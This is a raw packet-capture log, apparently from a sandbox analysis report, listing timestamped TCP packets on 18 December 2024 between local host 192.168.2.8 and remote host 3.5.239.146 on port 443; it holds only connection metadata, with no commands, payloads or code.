                                                                                                                                                                          Dec 18, 2024 13:06:01.598440886 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.598531961 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.598539114 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.598557949 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.598587990 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.598614931 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.598670959 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.642416954 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.653810024 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.653836966 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.653853893 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.653903008 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.653927088 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.653948069 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.653964996 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.653985023 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.654000998 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.654036045 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.654055119 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.654097080 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.661397934 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.661535025 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.661596060 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.661612034 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.704924107 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.755434990 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.755460024 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.755548954 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.755595922 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.755609989 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.798521996 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.798564911 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.798584938 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.798609972 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.798648119 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.798667908 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.798712969 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.835031986 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.835056067 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.835097075 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.835138083 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.835167885 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.835190058 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.835218906 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.871336937 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.871357918 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.871397018 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.871414900 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.871438980 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.871462107 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.871496916 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.923683882 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.923710108 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.962332010 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.962357044 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.962388039 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.962407112 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.962428093 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.962445974 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.962479115 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.962500095 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.962538958 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.984841108 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.984865904 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.984884977 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.984922886 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.984942913 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.984970093 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.984989882 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.985014915 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.985033989 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.985055923 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.005402088 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.005410910 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.005446911 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.005459070 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.005485058 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.005495071 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.005536079 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.005543947 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.005738974 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.025619030 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.025655031 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.025702000 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.025703907 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.025741100 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.025748968 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.025769949 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.025780916 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.025814056 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.028263092 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.045464039 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.045510054 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.045551062 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.045562983 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.045583010 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.065381050 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.065438986 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.065490007 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.065498114 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.065541983 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.086572886 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.086637020 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.086667061 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.086680889 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.086709023 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.142539978 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.142571926 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.146059990 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.146086931 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.146137953 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.721868038 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.724863052 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.727091074 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.727116108 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.727170944 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.727176905 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.727200985 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.727220058 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.727838993 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.734158993 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.734184027 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.734239101 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.734272003 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.734285116 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.751540899 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.751578093 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.751646042 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.751674891 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.751689911 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.767833948 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.767862082 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.767930031 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.767946005 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.767961979 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.773756981 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.773782969 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.773828983 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.773837090 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.773869038 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.814564943 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.904859066 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.904879093 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.904913902 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.904947996 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.905004978 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.905033112 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.905061960 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.910716057 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.910742044 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.910841942 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.910852909 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.910862923 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.916568995 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.916584015 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.916673899 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.916682005 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.925694942 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.925717115 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.925787926 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.925796032 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.925851107 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.942290068 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.942313910 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.942380905 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.942389965 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.943111897 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.943120003 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.943169117 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.947941065 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.947969913 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.948008060 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.948014975 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.948052883 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.948616982 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.962811947 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.962841988 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.962903976 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.962913036 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.962960958 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.968693972 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.968718052 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.968771935 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.968827963 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:02.968836069 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:02.968910933 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.099842072 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.099874020 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.099942923 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.099952936 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.099978924 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.099994898 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.105771065 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.105798960 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.105859041 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.105868101 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.105892897 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.111628056 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.111670017 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.111707926 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.111715078 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.111727953 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.111741066 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.111764908 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.120121002 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.120140076 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.120170116 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.120207071 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.120217085 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.120245934 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.136905909 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.136929989 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.137000084 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.137016058 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.137032986 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.152060032 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.152096987 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.152124882 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.152143002 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.152151108 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.152198076 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.157989025 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.158005953 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.158031940 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.158045053 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.158050060 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.158091068 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.289115906 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.289144039 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.881690979 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.889215946 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.889271021 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.889333010 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.889360905 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.889385939 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.909234047 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.909279108 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.909312010 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.909332037 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.909362078 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.921156883 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.921216011 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.921261072 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.921288967 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.921314001 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.926594019 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.926642895 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.926688910 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.926712036 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:03.926739931 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.970561028 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:03.970582962 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.017489910 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.058453083 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.058468103 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.058507919 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.058520079 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.058640003 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.058679104 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.058746099 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.058746099 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.059096098 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.064394951 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.064414978 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.064444065 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.064456940 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.064502001 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.064538002 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.070468903 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.070506096 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.070586920 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.070619106 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.070636988 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.077025890 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.077060938 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.077100039 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.077127934 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.077146053 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.099152088 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.099193096 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.099220037 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.099229097 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.099246025 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.099256992 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.099287033 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.104516983 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.104536057 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.104582071 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.104595900 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.104604959 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.104608059 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.104643106 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.116106987 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.116126060 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.116172075 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.116204977 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.116219997 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:04.122001886 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.122051954 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:04.122073889 CET49709443192.168.2.83.5.239.146
